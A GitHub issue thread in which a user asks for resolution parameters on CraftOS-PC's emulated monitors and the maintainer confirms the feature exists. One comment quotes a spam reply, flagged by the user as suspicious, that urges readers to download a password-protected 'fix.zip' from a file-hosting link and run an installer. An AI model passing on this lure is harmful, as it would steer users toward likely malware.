### ISSUE TITLE
optional resolution parameters for periphemu.create("monitor")

### ISSUE THREAD

**Issue by DJSynergy** [MCJack123/craftos2#371]
I am using CraftOS-PC as an emulated developement platform and i often want to test programs on multiple ingame monitor resolutions and stuff like that.

So if you place down a 5x5 Advanced Monitor Matrix in the game you end up with a resolution of 50x26 characters (textmode, default scale). This does not fit the actual emulated window and the resolution of the window is only adjustable with drag and drop and resets every time you restart the computer.

A nice solution would be an optional extra parameter (or two) for periphemu.create("monitor") like maybe so:
`periphemu.create(left, "monitor", 50, 26)`
so this would open up the new monitor window in that resolution.

Oh and btw it would be a nice feature if these two windows of the computer and the external monitor would not overlap and instead maybe open next to each other. I mean if someone is picking this idea up and is editing the code that way maybe this quality of life thing is on the same road ;)

**Comment by DJSynergy** [comment]
> Download https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file password: changeme In the installer menu, select "gcc."

SUS!

**Comment by MCJack123** [comment]
This is already supported :)

**Comment by DJSynergy** [comment]
> This is already supported :)

how exactly? there is nothin in the documentation about that as far as i read it. maybe i am blind?! o.O

**Comment by MCJack123** [comment]
It looks like the code doesn't set the window size anymore - I'll fix this.

**Comment by DJSynergy** [comment]
> It looks like the code doesn't set the window size anymore - I'll fix this.
> 
> Also yeah, it's probably not documented, but it's supported in the same way you mentioned.

for me it does exactly what i want it to do - window size is set to 50x26 if i set this.
so there still is the overlapping window where both windows are initialized on top of each other, but thats a minor issue.
thanks for your help. top!

**Comment by MCJack123** [comment]
There's nothing I can really do about window positioning - it creates the window at wherever the OS decides, and sometimes the OS decides to put windows on top of each other.

**Comment by DJSynergy** [comment]
> There's nothing I can really do about window positioning - it creates the window at wherever the OS decides, and sometimes the OS decides to put windows on top of each other.

thanks for your help anyways. I really love that software you wrote and i am really happy it exists. Now that i can create monitors with my own resolution i am really happy.
I just didnt try it because it wasnt mentioned in the docs, only the path for the printer pdf id mentioned but no resolution for monitors. Really nice it works tho.
